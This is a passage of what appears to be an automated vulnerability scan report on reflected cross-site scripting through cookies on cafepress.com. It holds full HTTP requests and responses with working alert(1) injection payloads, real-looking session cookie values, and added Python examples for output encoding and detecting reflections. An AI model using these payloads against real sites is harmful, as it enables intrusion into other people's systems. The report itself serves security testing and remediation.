HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 55461 Date: Sun, 26 Dec 2010 13:48:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8db02"-alert(1)-"9bd63bb7d30 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-ipad-case
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc4d</script><script>alert(1)</script>d48aac4b022 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-ipad-case HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ccc4d</script><script>alert(1)</script>d48aac4b022 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 55481 Date: Sun, 26 Dec 2010 13:48:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55481 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'ccc4d</script><script>alert(1)</script>d48aac4b022 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-iphone-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51aff"-alert(1)-"90ad1b3827e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 57100 Date: Sun, 26 Dec 2010 13:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57100 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA51aff"-alert(1)-"90ad1b3827e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-iphone-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c70c</script><script>alert(1)</script>36986f285d4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=3c70c</script><script>alert(1)</script>36986f285d4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 57121
Date: Sun, 26 Dec 2010 13:48:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
omain_us = 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '3c70c</script><script>alert(1)</script>36986f285d4 '
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
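The following is an added example and is not code from the XSS.CX report or from cafepress.com. It shows the output encoding the remediation above calls for, beside the insufficient fix of merely backslash-escaping quotes, and applies both to the cp_st payload echoed into the searchTerm assignment in this entry. The emit_search_term function and the SAFE_ALPHABET check are illustrative constructs; the ASP.NET application's real emitting code is not shown on this page.

```python
import re

# Added example, not code from the XSS.CX report or from cafepress.com: the
# output encoding the remediation calls for, beside the insufficient fix.
# The emitted <script> fragment mirrors the searchTerm assignment shown in the
# response above; the cookie values used as input are the report's own payloads.


def js_string_encode(value: str) -> str:
    """Encode value for use inside a quoted JavaScript string literal in an inline
    <script>. Every character outside [A-Za-z0-9] becomes \\xHH (code points below
    0x100) or \\uHHHH, so the result can contain no quote, backslash, newline,
    U+2028/U+2029 or '</' that the HTML or JS parser could act on."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02X}")
        elif cp < 0x10000:
            out.append(f"\\u{cp:04X}")
        else:
            # astral code point: emit its UTF-16 surrogate pair as two \\u escapes
            cp -= 0x10000
            out.append(f"\\u{0xD800 + (cp >> 10):04X}\\u{0xDC00 + (cp & 0x3FF):04X}")
    return "".join(out)


def naive_escape(value: str) -> str:
    """The common insufficient fix: backslash-escape quotes and backslashes only."""
    return value.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def emit_search_term(value: str, encoder) -> str:
    """Render the inline-script assignment seen in the response, via the given encoder."""
    return "<script>window.cafepress.tealeaf.searchTerm = '" + encoder(value) + "';</script>"


def script_element_intact(fragment: str) -> bool:
    """True when the only '</script' in the fragment is the real closing tag, i.e. the
    HTML tokenizer cannot be made to end the script element early."""
    return fragment.lower().count("</script") == 1


# Only these characters can appear in js_string_encode output; none of them can
# close a string literal, end a line, or start a tag.
SAFE_ALPHABET = re.compile(r"^[A-Za-z0-9\\]*$")


def js_string_decode(encoded: str) -> str:
    """Round-trip check: interpret the \\x/\\u escapes as a JS engine would.
    encoded is pure ASCII by construction, and surrogate pairs are re-joined."""
    text = encoded.encode("ascii").decode("unicode_escape")
    return text.encode("utf-16", "surrogatepass").decode("utf-16")


# Payloads taken from the report's cp_st (1.109) and cp-v (1.110) entries.
PAYLOAD_CPST = "3c70c</script><script>alert(1)</script>36986f285d4"
PAYLOAD_CPV = '46ce6"-alert(1)-"366e3ae2b93'

if __name__ == "__main__":
    for name, enc in (("naive", naive_escape), ("encoded", js_string_encode)):
        frag = emit_search_term(PAYLOAD_CPST, enc)
        print(f"{name}: script element intact = {script_element_intact(frag)}")
        print("  ", frag)
```

With the naive encoder the cp_st payload passes through untouched (it contains no quote to escape) and the fragment carries three </script tokens, so the browser closes the script element inside the literal and runs the injected block. With js_string_encode the fragment contains exactly one </script, and the round-trip decoder confirms the value the page's script receives is unchanged.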
1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-mugs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46ce6"-alert(1)-"366e3ae2b93 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, every character of the value outside [A-Za-z0-9] should be emitted as a JavaScript \xHH or \uHHHH escape before it is placed inside a quoted string literal. Backslash-escaping the quote character alone is not sufficient: the HTML parser ends a script element at the first </script it encounters regardless of the JavaScript quoting state, which is what the </script><script>alert(1)</script> payloads used against the cp_st cookie in this report rely on.
Request
GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 53742
Date: Sun, 26 Dec 2010 13:48:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA46ce6"-alert(1)-"366e3ae2b93 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
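As an added example, not code from the XSS.CX report or from cafepress.com, the check below confirms what the issue details for 1.109 and 1.110 above assert: that the reflected cookie value lands inside a script block and in which JavaScript string context (single-quoted searchTerm for cp_st, double-quoted s.eVar30 for cp-v). It models the HTML tokenizer's rule that a script element ends at the first </script regardless of JavaScript quoting, which is why a cookie value containing </script> breaks out of a single-quoted literal without ever closing the quote. The response bodies are constructed, abbreviated fragments modelled on the two entries, and the context tracker deliberately ignores JavaScript comments, regex and template literals.

```python
import re

# Added example, not code from the XSS.CX report or from cafepress.com: a check
# that confirms a reflected cookie value landed inside a <script> block and works
# out which JavaScript string context it landed in, i.e. what the findings above
# ("copied into a JavaScript string encapsulated in double/single quotation marks")
# assert. Simplification: JS comments, regex and template literals are not tracked.

SCRIPT_OPEN = re.compile(r"<script\b[^>]*>", re.I)
SCRIPT_CLOSE = re.compile(r"</script", re.I)


def script_blocks(body: str):
    """Yield (start, end) offsets of script content as the HTML tokenizer sees it:
    a script element ends at the first '</script', whatever the JS quoting state."""
    pos = 0
    while True:
        open_tag = SCRIPT_OPEN.search(body, pos)
        if not open_tag:
            return
        start = open_tag.end()
        close_tag = SCRIPT_CLOSE.search(body, start)
        if not close_tag:
            yield start, len(body)
            return
        yield start, close_tag.start()
        pos = close_tag.end()


def js_string_context(code: str):
    """Return '"', "'" or None: the string literal still open at the end of code."""
    quote = None
    i = 0
    while i < len(code):
        ch = code[i]
        if quote:
            if ch == "\\":       # skip the escaped character
                i += 2
                continue
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        i += 1
    return quote


HOW_TERMINATES = "terminates the script element"
HOW_CLOSES_STRING = "closes the enclosing string literal"
HOW_BARE = "lands in bare JavaScript"
HOW_CONTAINED = "stays inside the string literal"


def classify_reflection(body: str, payload: str) -> dict:
    """Locate payload in a response body and report how it landed."""
    idx = body.find(payload)
    if idx < 0:
        return {"reflected": False}
    for start, end in script_blocks(body):
        if start <= idx < end:
            quote = js_string_context(body[start:idx])
            if "</script" in payload.lower():
                how = HOW_TERMINATES        # breaks out regardless of quoting
            elif quote is None:
                how = HOW_BARE
            elif quote in payload:
                how = HOW_CLOSES_STRING
            else:
                how = HOW_CONTAINED
            return {"reflected": True, "in_script": True, "quote": quote,
                    "breaks_out": how != HOW_CONTAINED, "how": how}
    return {"reflected": True, "in_script": False}


# Constructed, abbreviated response fragments modelled on entries 1.109 (cp_st,
# single-quoted searchTerm) and 1.110 (cp-v, double-quoted s.eVar30) above.
PAYLOAD_CPST = "3c70c</script><script>alert(1)</script>36986f285d4"
BODY_CPST = ("<html><head><script>window.cafepress.tealeaf = {};\n"
             "window.cafepress.tealeaf.searchTerm = '" + PAYLOAD_CPST + " '\n"
             "window.cafepress.tealeaf.salesChannel = 'Make'\n</script></head></html>")

PAYLOAD_CPV = '46ce6"-alert(1)-"366e3ae2b93'
BODY_CPV = ('<html><head><script type="text/javascript">\n'
            's.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA'
            + PAYLOAD_CPV + ' ";\ns.eVar26 = "";\n</script></head><body></body></html>')

# Constructed: the cp-v value emitted with \xHH escapes, so the raw payload never appears.
BODY_ENCODED = '<script>s.eVar30 = "46ce6\\x22-alert(1)-\\x22366e3ae2b93";</script>'

if __name__ == "__main__":
    for name, body, payload in (("cp_st", BODY_CPST, PAYLOAD_CPST),
                                ("cp-v", BODY_CPV, PAYLOAD_CPV),
                                ("encoded", BODY_ENCODED, PAYLOAD_CPV)):
        print(name, classify_reflection(body, payload))
```

Run against a real response, the same call takes the raw body and the exact cookie value that was sent; a result of reflected but not in_script means the value surfaced in HTML rather than script context and needs the HTML-context checks instead, and the encoded case shows why a verifier must search for the literal payload rather than its alphanumeric prefix and suffix alone.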
1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-mugs
Issue detail
